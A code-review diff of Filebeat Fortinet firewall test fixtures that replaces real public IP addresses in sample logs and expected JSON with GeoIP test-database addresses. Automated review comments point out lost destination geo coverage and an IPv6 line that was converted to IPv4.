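Review bot: The address replacement in this hunk is one-sided: the `locip` values (8.8.8.8, 9.9.9.9, 7.6.3.4, 50.1.1.100) and the FortiCloud `server` value move to addresses the GeoIP test database resolves, while the peer addresses on the same records (`remip=8.8.4.4`, `8.4.5.4`, `8.8.5.4`, `8.8.8.6`, and `server="4.4.4.4"` on the disconnect line) stay as real public addresses that it does not. The consequence shows in the event.log-expected.json hunks that follow, where every `destination.geo.*` / `destination.as.*` block is deleted while the `source.geo.*` blocks are rewritten, so destination-side geo enrichment in the fortinet pipeline is no longer asserted by this fixture. Changing the `remip` and `4.4.4.4` values to further test-database addresses, e.g. `remip=81.2.69.145` on the phase-1 error record, would keep both directions covered. Note that `1.128.3.4` and `175.16.199.1` are routable allocations rather than RFC 5737 TEST-NET ranges, presumably chosen because the test database has entries for them; that is fine as long as these fixtures are only ever resolved against that database.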
diff --git a/x-pack/filebeat/module/fortinet/firewall/test/event.log-expected.json b/x-pack/filebeat/module/fortinet/firewall/test/event.log-expected.json index b44c6d83aa5c..524fdb93b6d3 100644 --- a/x-pack/filebeat/module/fortinet/firewall/test/event.log-expected.json +++ b/x-pack/filebeat/module/fortinet/firewall/test/event.log-expected.json @@ -49,13 +49,6 @@ }, { "@timestamp": "2020-04-23T12:32:47.000-05:00", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "8.8.4.4", "destination.port": 500, "event.action": "negotiate", @@ -93,19 +86,20 @@ "observer.type": "firewall", "observer.vendor": "Fortinet", "related.ip": [ - "8.8.4.4", - "8.8.8.8" + "175.16.199.1", + "8.8.4.4" ], "rule.description": "IPsec phase 1 error", "service.type": "fortinet", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "8.8.8.8", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "source.port": 500, "tags": [ "fortinet-firewall", 
@@ -114,13 +108,6 @@ }, { "@timestamp": "2020-04-23T12:32:31.000-05:00", - "destination.as.number": 3356, - "destination.as.organization.name": "Level 3 Parent, LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "8.4.5.4", "destination.port": 500, "event.action": "negotiate", @@ -153,7 +140,7 @@ "fortinet.firewall.vpntunnel": "elasticvpn", "input.type": "log", "log.level": "notice", - "log.offset": 981, + "log.offset": 986, "message": "progress IPsec phase 1", "network.direction": "outbound", "network.type": "ipv4", @@ -163,19 +150,14 @@ "observer.type": "firewall", "observer.vendor": "Fortinet", "related.ip": [ - "8.4.5.4", - "9.9.9.9" + "1.128.3.4", + "8.4.5.4" ], "rule.description": "Progress IPsec phase 1", "service.type": "fortinet", - "source.as.number": 19281, - "source.as.organization.name": "Quad9", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "FR", - "source.geo.country_name": "France", - "source.geo.location.lat": 48.8582, - "source.geo.location.lon": 2.3387, - "source.ip": "9.9.9.9", + "source.as.number": 1221, + "source.as.organization.name": "Telstra Pty Ltd", + "source.ip": "1.128.3.4", "source.port": 500, "tags": [ "fortinet-firewall", @@ -214,7 +196,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "notice", - "log.offset": 1555, + "log.offset": 1562, "message": "Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0", "observer.name": "testswitch3", "observer.product": "Fortigate", @@ -254,7 +236,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "notice", - "log.offset": 2045, + "log.offset": 2052, "message": "User elastiiiuser added to auth logon", "network.type": "ipv4", "observer.name": "testswitch3", 
@@ -279,13 +261,6 @@ }, { "@timestamp": "2020-04-23T12:32:00.000-05:00", - "destination.as.number": 3356, - "destination.as.organization.name": "Level 3 Parent, LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "8.8.5.4", "destination.port": 500, "event.action": "negotiate", @@ -318,7 +293,7 @@ "fortinet.firewall.vpntunnel": "testvpn", "input.type": "log", "log.level": "notice", - "log.offset": 2423, + "log.offset": 2430, "message": "progress IPsec phase 1", "network.direction": "outbound", "network.type": "ipv4", @@ -328,17 +303,20 @@ "observer.type": "firewall", "observer.vendor": "Fortinet", "related.ip": [ - "7.6.3.4", - "8.8.5.4" + "8.8.5.4", + "81.2.69.145" ], "rule.description": "Progress IPsec phase 1", "service.type": "fortinet", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "7.6.3.4", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.145", "source.port": 500, "tags": [ "fortinet-firewall", @@ -360,7 +338,7 @@ "fortinet.firewall.version": "1.522479", "input.type": "log", "log.level": "notice", - "log.offset": 2993, + "log.offset": 3004, "message": "FortiSandbox AV database updated", "observer.name": "testswitch3", "observer.product": "Fortigate", 
@@ -398,7 +376,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "information", - "log.offset": 3297, + "log.offset": 3308, "message": "Add a FortiClient Connection.", "observer.name": "testswitch3", "observer.product": "Fortigate", @@ -418,13 +396,6 @@ }, { "@timestamp": "2020-04-23T12:23:47.000-05:00", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "8.8.8.6", "event.action": "ssl-new-con", "event.category": [ @@ -448,7 +419,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "information", - "log.offset": 3767, + "log.offset": 3778, "message": "SSL new connection", "network.type": "ipv4", "observer.name": "testswitch3", @@ -468,13 +439,6 @@ }, { "@timestamp": "2020-04-23T12:23:47.000-05:00", - "destination.as.number": 3356, - "destination.as.organization.name": "Level 3 Parent, LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "8.8.5.4", "event.action": "tunnel-up", "event.category": [ @@ -500,7 +464,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "information", - "log.offset": 4144, + "log.offset": 4155, "message": "SSL tunnel established", "network.type": "ipv4", "observer.name": "testswitch3", @@ -548,7 +512,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "notice", - "log.offset": 4575, + "log.offset": 4586, "message": "FSSO-logoff event from FSSO_somefssoserver: user elasticuser logged off 1192.168.1.1", "network.type": "ipv4", "observer.name": "testswitch3", 
@@ -582,14 +546,14 @@ "event.timezone": "-0500", "fileset.name": "firewall", "fortinet.firewall.action": "connect", - "fortinet.firewall.server": "9.9.9.9", + "fortinet.firewall.server": "1.128.3.4", "fortinet.firewall.subtype": "system", "fortinet.firewall.type": "event", "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "notice", - "log.offset": 5000, - "message": "FortiCloud 9.9.9.9 server is connected", + "log.offset": 5011, + "message": "FortiCloud 1.128.3.4 server is connected", "observer.name": "testswitch3", "observer.product": "Fortigate", "observer.serial_number": "someotherrouteridagain", @@ -620,7 +584,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "notice", - "log.offset": 5320, + "log.offset": 5335, "message": "FortiCloud 4.4.4.4 server is disconnected", "observer.name": "testswitch3", "observer.product": "Fortigate", @@ -636,14 +600,15 @@ }, { "@timestamp": "2020-11-02T08:11:38.000-02:00", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.port": 500, "event.action": "negotiate", "event.category": [ 
@@ -674,7 +639,7 @@ "fortinet.firewall.vpntunnel": "P1_Test", "input.type": "log", "log.level": "notice", - "log.offset": 5675, + "log.offset": 5690, "message": "progress IPsec phase 1", "network.direction": "outbound", "network.type": "ipv4", @@ -685,7 +650,7 @@ "observer.vendor": "Fortinet", "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "rule.description": "Progress IPsec phase 1", "service.type": "fortinet", @@ -719,7 +684,7 @@ "fortinet.firewall.vd": "vdom1", "input.type": "log", "log.level": "information", - "log.offset": 6184, + "log.offset": 6204, "message": "Administrator admin logged in successfully from ssh(172.16.200.254)", "network.type": "ipv4", "observer.product": "Fortigate", @@ -743,16 +708,6 @@ }, { "@timestamp": "2019-05-13T14:21:42.000-02:00", - "destination.as.number": 7065, - "destination.as.organization.name": "Sonoma Interconnect", - "destination.geo.city_name": "North Highlands", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6741, - "destination.geo.location.lon": -121.3768, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "50.1.1.101", "destination.port": 500, "event.action": "negotiate", @@ -785,7 +740,7 @@ "fortinet.firewall.vpntunnel": "test", "input.type": "log", "log.level": "notice", - "log.offset": 6611, + "log.offset": 6631, "message": "progress IPsec phase 1", "network.direction": "outbound", "network.type": "ipv4", 
@@ -793,22 +748,14 @@ "observer.type": "firewall", "observer.vendor": "Fortinet", "related.ip": [ - "50.1.1.100", + "1.128.3.4", "50.1.1.101" ], "rule.description": "Progress IPsec phase 1", "service.type": "fortinet", - "source.as.number": 7065, - "source.as.organization.name": "Sonoma Interconnect", - "source.geo.city_name": "North Highlands", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 38.6741, - "source.geo.location.lon": -121.3768, - "source.geo.region_iso_code": "US-CA", - "source.geo.region_name": "California", - "source.ip": "50.1.1.100", + "source.as.number": 1221, + "source.as.organization.name": "Telstra Pty Ltd", + "source.ip": "1.128.3.4", "source.port": 500, "tags": [ "fortinet-firewall", @@ -838,7 +785,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "notice", - "log.offset": 7127, + "log.offset": 7146, "message": "User bob succeeded in authentication", "network.type": "ipv4", "observer.product": "Fortigate", @@ -886,7 +833,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "information", - "log.offset": 7526, + "log.offset": 7545, "message": "Add a FortiClient Connection.", "observer.product": "Fortigate", "observer.type": "firewall", @@ -926,7 +873,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "information", - "log.offset": 7946, + "log.offset": 7965, "message": "Close a FortiClient Connection.", "observer.product": "Fortigate", "observer.type": "firewall", @@ -958,7 +905,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "information", - "log.offset": 8371, + "log.offset": 8390, "message": "Updated tag FCTEMS0000011111_AV-Running.", "observer.name": "firewall", "observer.product": "Fortigate", 
@@ -988,7 +935,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "information", - "log.offset": 8717, + "log.offset": 8736, "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.", "observer.name": "firewall", "observer.product": "Fortigate", @@ -1018,7 +965,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "information", - "log.offset": 9071, + "log.offset": 9090, "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.", "observer.name": "firewall", "observer.product": "Fortigate", @@ -1048,7 +995,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "information", - "log.offset": 9429, + "log.offset": 9448, "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.", "observer.name": "firewall", "observer.product": "Fortigate", @@ -1078,7 +1025,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "information", - "log.offset": 9795, + "log.offset": 9814, "message": "Updated tag FCTEMS0000011111_AV-Running.", "observer.name": "firewall", "observer.product": "Fortigate", @@ -1108,7 +1055,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "information", - "log.offset": 10131, + "log.offset": 10150, "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.", "observer.name": "firewall", "observer.product": "Fortigate", @@ -1138,7 +1085,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "information", - "log.offset": 10475, + "log.offset": 10494, "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.", "observer.name": "firewall", "observer.product": "Fortigate", @@ -1168,7 +1115,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "information", - "log.offset": 10823, + "log.offset": 10842, "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.", "observer.name": "firewall", "observer.product": "Fortigate", 
diff --git a/x-pack/filebeat/module/fortinet/firewall/test/traffic.log b/x-pack/filebeat/module/fortinet/firewall/test/traffic.log index 5da8ddc11e05..4395f0c8d30f 100644 --- a/x-pack/filebeat/module/fortinet/firewall/test/traffic.log +++ b/x-pack/filebeat/module/fortinet/firewall/test/traffic.log 
@@ -1,12 +1,12 @@ -<189>date=2020-04-23 time=01:16:08 devname="testswitch1" devid="somerouterid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="OPERATIONAL" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf="srcintfname" srcintfrole="lan" dstip=8.8.8.8 dstport=161 dstintf="dstintfname" dstintfrole="lan" sessionid=155313 proto=17 action="deny" policyid=0 policytype="policy" service="SNMP" dstcountry="Reserved" srccountry="Reserved" trandisp="noop" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat="unscanned" crscore=30 craction=131072 crlevel="high" -<188>date=2020-04-23 time=12:14:09 devname="newfirewall" devid="newrouterid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230049761513222 tz="-0500" srcip=192.168.1.6 srcport=53438 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" sessionid=435234 proto=17 action="dns" policyid=26 policytype="policy" poluuid="2345de-b143-52134d8-6654f-4654sdfg16f431" policyname="elasticnewruleset" service="DNS" dstcountry="Netherlands" srccountry="Reserved" appcat="unscanned" crscore=5 craction=54144 crlevel="low" -<189>date=2020-04-23 time=12:11:51 devname="newfirewall" devid="newrouterid" logid="0000000020" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587229911390385486 tz="-0500" srcip=192.168.10.10 srcport=6000 srcintf="port1" srcintfrole="lan" dstip=8.6.4.7 dstport=6000 dstintf="wan1" dstintfrole="wan" sessionid=4352 proto=17 action="accept" policyid=3426 policytype="policy" poluuid="1765de8-5a13-765da73fdsfa1c" policyname="newruleelastic" service="portname" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=123.123.123.123 transport=60964 appcat="unknown" applist="policylist" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728 -<189>date=2020-04-23 time=12:11:48 devname="newfirewall" devid="newrouterid" 
logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229908751434997 tz="-0500" srcip=2001:4860:4860::8888 identifier=0 srcintf="port1" srcintfrole="lan" dstip=2001:4860:4860::8888 dstintf="unknown0" dstintfrole="undefined" sessionid=6542345 proto=58 action="accept" policyid=0 policytype="someotherpolicy" service="icmp6/1/0" trandisp="noop" app="icmp6/25/0" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat="unscanned" -<189>date=2020-04-23 time=13:10:57 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229857509058693 tz="-0400" srcip=9.7.7.7 identifier=61 srcintf="wan1" srcintfrole="wan" dstip=8.8.8.8 dstintf="unknown0" dstintfrole="undefined" sessionid=123 proto=1 action="accept" policyid=0 policytype="rulepolicy" service="PING" dstcountry="Norway" srccountry="Netherlands" trandisp="noop" app="PING" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat="unscanned" +<189>date=2020-04-23 time=01:16:08 devname="testswitch1" devid="somerouterid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="OPERATIONAL" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf="srcintfname" srcintfrole="lan" dstip=175.16.199.1 dstport=161 dstintf="dstintfname" dstintfrole="lan" sessionid=155313 proto=17 action="deny" policyid=0 policytype="policy" service="SNMP" dstcountry="Reserved" srccountry="Reserved" trandisp="noop" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat="unscanned" crscore=30 craction=131072 crlevel="high" +<188>date=2020-04-23 time=12:14:09 devname="newfirewall" devid="newrouterid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230049761513222 tz="-0500" srcip=192.168.1.6 srcport=53438 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=53 dstintf="wan1" dstintfrole="wan" sessionid=435234 proto=17 action="dns" policyid=26 policytype="policy" 
poluuid="2345de-b143-52134d8-6654f-4654sdfg16f431" policyname="elasticnewruleset" service="DNS" dstcountry="Netherlands" srccountry="Reserved" appcat="unscanned" crscore=5 craction=54144 crlevel="low" +<189>date=2020-04-23 time=12:11:51 devname="newfirewall" devid="newrouterid" logid="0000000020" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587229911390385486 tz="-0500" srcip=175.16.199.1 srcport=6000 srcintf="port1" srcintfrole="lan" dstip=8.6.4.7 dstport=6000 dstintf="wan1" dstintfrole="wan" sessionid=4352 proto=17 action="accept" policyid=3426 policytype="policy" poluuid="1765de8-5a13-765da73fdsfa1c" policyname="newruleelastic" service="portname" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=67.43.156.12 transport=60964 appcat="unknown" applist="policylist" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728 +<189>date=2020-04-23 time=12:11:48 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229908751434997 tz="-0500" srcip=81.2.69.144 identifier=0 srcintf="port1" srcintfrole="lan" dstip=81.2.69.144 dstintf="unknown0" dstintfrole="undefined" sessionid=6542345 proto=58 action="accept" policyid=0 policytype="someotherpolicy" service="icmp6/1/0" trandisp="noop" app="icmp6/25/0" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat="unscanned" +<189>date=2020-04-23 time=13:10:57 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229857509058693 tz="-0400" srcip=81.2.69.144 identifier=61 srcintf="wan1" srcintfrole="wan" dstip=175.16.199.1 dstintf="unknown0" dstintfrole="undefined" sessionid=123 proto=1 action="accept" policyid=0 policytype="rulepolicy" service="PING" dstcountry="Norway" srccountry="Netherlands" trandisp="noop" app="PING" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 
rcvdpkt=40 appcat="unscanned" <188>date=2020-04-23 time=12:14:39 devname="firewall3" devid="oldfwid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230079841464445 tz="-0500" srcip=192.168.1.1 srcport=62493 srcintf="port1" srcintfrole="lan" dstip=192.168.100.100 dstport=1235 dstintf="newinterface" dstintfrole="undefined" sessionid=54234 proto=17 action="ip-conn" policyid=49 policytype="policy" poluuid="654cc-b6542-53467u8-e45234-1566casd35f7836" policyname="oldpolicyname" user="elasticsuper" authserver="FSSO_newfsso" service="udp/12302" dstcountry="Reserved" srccountry="Reserved" appcat="unscanned" crscore=5 craction=63332144 crlevel="low" -<189>date=2020-04-23 time=12:14:28 devname="firewall3" devid="oldfwid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587230069291463928 tz="-0500" srcip=192.168.50.50 srcport=56603 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=442 dstintf="wan1" dstintfrole="wan" sessionid=2345 proto=6 action="close" policyid=2365 policytype="policy" poluuid="654644c-b064-fdgdf3425-f003-1234ghdf682e05f" policyname="someoldpolicyname" user="elasticuser" group="testgroup" authserver="FSSO_something" service="HTTPS" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=23.23.23.23 transport=603 appid=43540 app="Skype.Portals" appcat="Collaboration" apprisk="elevated" applist="someapplist" appact="detected" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality="Seq_num(3), alive, selected" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction="block" countweb=1 countapp=1 crscore=5 craction=6144 crlevel="low" +<189>date=2020-04-23 time=12:14:28 devname="firewall3" devid="oldfwid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587230069291463928 tz="-0500" srcip=81.2.69.145 srcport=56603 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=442 dstintf="wan1" 
dstintfrole="wan" sessionid=2345 proto=6 action="close" policyid=2365 policytype="policy" poluuid="654644c-b064-fdgdf3425-f003-1234ghdf682e05f" policyname="someoldpolicyname" user="elasticuser" group="testgroup" authserver="FSSO_something" service="HTTPS" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=23.23.23.23 transport=603 appid=43540 app="Skype.Portals" appcat="Collaboration" apprisk="elevated" applist="someapplist" appact="detected" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality="Seq_num(3), alive, selected" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction="block" countweb=1 countapp=1 crscore=5 craction=6144 crlevel="low" <189>date=2019-03-31 time=06:42:54 logid="0002000012" type="traffic" subtype="multicast" level="notice" vd="vdom1" eventtime=1554039772 srcip=172.16.200.55 srcport=60660 srcintf="port25" srcintfrole="undefined" dstip=230.1.1.2 dstport=7878 dstintf="port3" dstintfrole="undefined" sessionid=1162 proto=17 action="accept" policyid=1 policytype="multicast-policy" service="udp/7878" dstcountry="Reserved" srccountry="Reserved" trandisp="noop" duration=22 sentbyte=5940 rcvdbyte=0 sentpkt=11 rcvdpkt=0 appcat="unscanned" -<189>date=2019-05-10 time=14:18:54 logid="0004000017" type="traffic" subtype="sniffer" level="notice" vd="root" eventtime=1557523134021045897 srcip=208.91.114.4 srcport=50463 srcintf="port1" srcintfrole="undefined" dstip=104.80.88.154 dstport=443 dstintf="port1" dstintfrole="undefined" sessionid=2193276 proto=6 action="accept" policyid=3 policytype="sniffer" service="HTTPS" dstcountry="United States" srccountry="Canada" trandisp="snat" transip=0.0.0.0 transport=0 duration=10 sentbyte=0 rcvdbyte=0 sentpkt=0 rcvdpkt=0 appcat="unscanned" utmaction="allow" countips=1 crscore=5 craction=32768 sentdelta=0 rcvddelta=0 utmref=65162-7772 +<189>date=2019-05-10 time=14:18:54 logid="0004000017" type="traffic" subtype="sniffer" level="notice" vd="root" 
eventtime=1557523134021045897 srcip=67.43.156.15 srcport=50463 srcintf="port1" srcintfrole="undefined" dstip=104.80.88.154 dstport=443 dstintf="port1" dstintfrole="undefined" sessionid=2193276 proto=6 action="accept" policyid=3 policytype="sniffer" service="HTTPS" dstcountry="United States" srccountry="Canada" trandisp="snat" transip=0.0.0.0 transport=0 duration=10 sentbyte=0 rcvdbyte=0 sentpkt=0 rcvdpkt=0 appcat="unscanned" utmaction="allow" countips=1 crscore=5 craction=32768 sentdelta=0 rcvddelta=0 utmref=65162-7772 <189>date=2019-05-13 time=11:45:04 logid="0000000013" type="traffic" subtype="forward" level="notice" vd="vdom1" eventtime=1557773104815101919 srcip=10.1.100.11 srcport=60446 srcintf="port12" srcintfrole="undefined" dstip=172.16.200.55 dstport=80 dstintf="port11" dstintfrole="undefined" srcuuid="48420c8a-5c88-51e9-0424-a37f9e74621e" dstuuid="187d6f46-5c86-51e9-70a0-fadcfc349c3e" poluuid="3888b41a-5c88-51e9-cb32-1c32c66b4edf" sessionid=359260 proto=6 action="close" policyid=4 policytype="policy" service="HTTP" dstcountry="Reserved" srccountry="Reserved" trandisp="snat" transip=172.16.200.2 transport=60446 appid=15893 app="HTTP.BROWSER" appcat="Web.Client" apprisk="medium" applist="g-default" duration=1 sentbyte=412 rcvdbyte=2286 sentpkt=6 rcvdpkt=6 wanin=313 wanout=92 lanin=92 lanout=92 utmaction="block" countav=1 countapp=1 crscore=50 craction=2 osname="Ubuntu" mastersrcmac="a2:e9:00:ec:40:01" srcmac="a2:e9:00:ec:40:01" srcserver=0 utmref=65497-770 <189>date=2019-05-13 time=16:29:50 logid="0000000013" type="traffic" subtype="forward" level="notice" vd="vdom1" eventtime=1557790190452146185 srcip=10.1.100.11 srcport=44258 srcintf="port12" srcintfrole="undefined" dstip=185.244.31.158 dstport=80 dstintf="port11" dstintfrole="undefined" srcuuid="ae28f494-5735-51e9-f247-d1d2ce663f4b" dstuuid="ae28f494-5735-51e9-f247-d1d2ce663f4b" poluuid="ccb269e0-5735-51e9-a218-a397dd08b7eb" sessionid=381780 proto=6 action="close" policyid=1 policytype="policy" 
service="HTTP" dstcountry="Germany" srccountry="Reserved" trandisp="snat" transip=172.16.200.2 transport=44258 duration=5 sentbyte=736 rcvdbyte=3138 sentpkt=14 rcvdpkt=5 appcat="unscanned" utmaction="block" countweb=1 crscore=30 craction=4194304 osname="Ubuntu" mastersrcmac="a2:e9:00:ec:40:01" srcmac="a2:e9:00:ec:40:01" srcserver=0 utmref=65497-796 <189>date=2019-05-15 time=17:58:10 logid="0000000013" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1557968289 srcip=10.1.100.22 srcport=46810 srcintf="port10" srcintfrole="lan" dstip=172.16.200.55 dstport=80 dstintf="port9" dstintfrole="wan" poluuid="d8ce7a90-7763-51e9-e2be-741294c96f31" sessionid=4017 proto=6 action="close" policyid=1 policytype="policy" service="HTTP" dstcountry="Reserved" srccountry="Reserved" trandisp="snat" transip=172.16.200.10 transport=46810 duration=89 sentbyte=565 rcvdbyte=9112 sentpkt=9 rcvdpkt=8 appcat="unscanned" utmaction="block" countips=1 crscore=50 craction=4096 devtype="Unknown" devcategory="None" mastersrcmac="00:0c:29:51:38:5e" srcmac="00:0c:29:51:38:5e" srcserver=0 utmref=0-302 diff --git a/x-pack/filebeat/module/fortinet/firewall/test/traffic.log-expected.json b/x-pack/filebeat/module/fortinet/firewall/test/traffic.log-expected.json index a9cae52aa9be..ca1da526e1f5 100644 --- a/x-pack/filebeat/module/fortinet/firewall/test/traffic.log-expected.json +++ b/x-pack/filebeat/module/fortinet/firewall/test/traffic.log-expected.json 
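Review bot: Rewriting the `logid="0001000014"` line from `srcip=2001:4860:4860::8888 ... dstip=2001:4860:4860::8888` to `srcip=81.2.69.144 ... dstip=81.2.69.144` drops the only IPv6 addresses in this fixture, so the pipeline's IPv6 handling is no longer covered, and the resulting event pairs `proto=58` / `service="icmp6/1/0"` with IPv4 endpoints (the expected JSON now carries `"network.type": "ipv4"` next to `"network.transport": "ipv6-icmp"`), a combination a FortiGate would not emit. If the intent is to avoid real-world IPs in favour of GeoIP test-database addresses, the test database presumably also contains IPv6 ranges — worth confirming — so an IPv6 source/destination pair should be kept on this line and the expected document regenerated. Failing that, add a comment in the test README noting that IPv6 parsing is intentionally untested here so the gap is visible.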
@@ -1,15 +1,16 @@ [ { "@timestamp": "2020-04-23T01:16:08.000-02:00", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.port": 161, "event.action": "deny", "event.category": [ @@ -46,7 +47,7 @@ "log.level": "notice", "log.offset": 0, "network.bytes": 0, - "network.community_id": "1:5XHCUlirlh1DoTaoFuXEVxc6Obs=", + "network.community_id": "1:8bNES6YDdszaPi28xM3VcSwJdbg=", "network.iana_number": "17", 